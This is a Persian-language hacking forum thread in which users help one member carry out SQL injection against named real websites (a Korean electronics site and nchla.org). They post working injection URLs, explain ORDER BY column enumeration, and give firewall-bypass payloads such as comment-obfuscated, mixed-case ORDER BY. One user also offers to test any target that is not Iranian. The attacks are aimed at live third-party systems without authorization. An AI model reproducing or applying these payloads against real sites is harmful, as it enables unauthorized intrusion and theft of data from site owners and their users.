اطلاعیه

**Mr.X2** · 06-18-2014, 09:44 AM

RE: مشکل در نفوذ به تارگت

درود

مثلا

http://www.pctronix.co.kr/index.php?mm_id=79
بعد = شما از - این استفاده کنید یا در آخر

--+ استفاده کردید یانه ؟؟؟؟؟؟؟؟

**r0bb3r68** · 06-18-2014, 02:58 PM

RE: مشکل در نفوذ به تارگت

عزیز تو order bY رو اشتباه نوشتی...
ببین از نظر املایی درست نوشتی....

**teruy** · 06-18-2014, 06:05 PM

RE: مشکل در نفوذ به تارگت

سلام
خیر اون فقط اشتباه تایپی بوده برادر.
[hr]
سلام
کارکتر+ رو در انتها قرار دادم واز این راه ام استفاده کردم:

کد:

asp?id=-999'+order+by+999--+

**Mr.XpR** · 06-18-2014, 06:21 PM

RE: مشکل در نفوذ به تارگت

بعضی از تارگت ها به این صورت هست .

به خطای ابتدا کار نداشته باش منتظر رویداد خطای بعد برای بدست آوردن تعداد ستون باش

کد:

http://www.pctronix.co.kr/index.php?mm_code=79&sm_code=80&board_no=2+order+by+1

یک خطا مشاهده شد حالا ستون 100 را درخواست بده .

کد:

http://www.pctronix.co.kr/index.php?mm_code=79&sm_code=80&board_no=2+order+by+100

همانطور که میبینی دو تا خطا چاپ شد ، چون ستون وجود ندارد و خطا ظاهر شد ، حالا شما از 1 تا زمانی که خطای دوم چاپ میشود مرحله را ادامه دهید .

در بعضی مواقع هم دیوار آتش سرور مانع از اجرای commands میشود که میتونی با دستور order مرحله شناسایی ستون را بصورت زیر بای پس کنی :

کد:

/**/+OrDeR+/**/+bY+/**/+1--

/**/+!order+/**/+!bY+/**/+1-

در ادامه تاپیک زیر را پیشنهاد میکنم بررسی کنی :

http://iranhack.com/acc/thread-1571.html

**teruy** · 06-19-2014, 11:36 AM

RE: مشکل در نفوذ به تارگت

سلام
متاسفانه روش های زیادی رو در این مسیر یاد گرفتم و ازمایش کردم اما همچنان تارگت مورد نظر عدد مورد نظر رو در order by به من نشون نمیده
راه دیگه ای به نظر شما نمیرسه؟
خیلی کنجکاو شدم که چرا این موضوع جواب نمیده؟

**Mr.X2** · 06-19-2014, 12:02 PM

RE: مشکل در نفوذ به تارگت

تارگت بزار

اگه ایرانی نیست تست کنم

**teruy** · 06-19-2014, 12:08 PM

RE: مشکل در نفوذ به تارگت

سلام
اینم تارگت مورد نظر: http://nchla.org/actiondisplay.asp?ID=292%27

**AL1R3Z4** · 06-19-2014, 12:26 PM

RE: مشکل در نفوذ به تارگت

این تارگت شما از db mssql استفاده میکنه (میتونید از دستوراتی مثل having هم استفاده کنید) اما خب:
اول برای اینکه بفهمی متد order by نیاز به بایپس نداره و فیلتر نیست دوتا عدد 100 و 1 تست کن

کد:

http://nchla.org/actiondisplay.asp?ID=292+order+by+100--

خب میبینی که خطا میده حالا عدد 1

کد:

http://nchla.org/actiondisplay.asp?ID=292+order+by+1--

خب حالا میبینی که صفحه کامل لود میشه و بالا میاد پس متوجه میشی که این متد نیاز به بایپس نداره (مثلا /**/+OrDeR+/**/+bY+/**/)

حالا مثلا مقدار 10 میدی میبینی که باز خطا میده 5 بدی خطا نمیده و صفحه کامل لود میشه پس باد اضافه کنیم وقتی 9 میدیم باز هم کامل لود میشه خب دیدیم که با مقدار 10 خطا داد ولی به مقدار 9 خطا نداد پس ستون های ما 9 تا است:

کد:

http://nchla.org/actiondisplay.asp?ID=292+order+by+10--

موفق باشید

**teruy** · 06-19-2014, 12:47 PM

RE: مشکل در نفوذ به تارگت

سلام دوست من
بسیار ممنونم.
فکر کنم اشتباه از تایپ بوده.

**./PeyMan** · 06-20-2014, 12:19 AM

RE: مشکل در نفوذ به تارگت

درسته ک روی 9 ب ارور نمیخوریم
اما 17 هم ارور نمیده
http://nchla.org/actiondisplay.asp?ID=292+order+by+17--

**0x8F** · 06-20-2014, 04:16 AM

RE: مشکل در نفوذ به تارگت

توجه کنید که شماره 10 , 11 خوانده نمیشود !!! شما به ارور هم توجه کنید !!
تعداد ستون 17 میباشد ! چون اعداد بالای 17 همانطور که تو ارور معلوم هست واضح میگه همچین ستونی وجود نداره

موفق باشید
[hr]

**teruy** · 06-20-2014, 08:01 AM

RE: مشکل در نفوذ به تارگت

سلام
پس میتونیم به این نتیجه برسیم که اولین عددی که با دستور order by صفحه لود میشه
همیشه حتما تعداد کلومن ها نیست؟

**./PeyMan** · 06-20-2014, 11:06 AM

RE: مشکل در نفوذ به تارگت

نه باید به اروری ک در ستون بعدی میده توجه کنی

**Mr.XpR** · 06-20-2014, 11:13 AM

RE: مشکل در نفوذ به تارگت

پیشنهاد میکنم جتمی فیلم های آموزشی SQLi را دانلود کنید و با دقت مشاهده کنید تا به تمامی پاسخ های خود برسید .

http://iranhack.com/acc/thread-1203.html

اول تحقیق و جستجو بعد سوال :l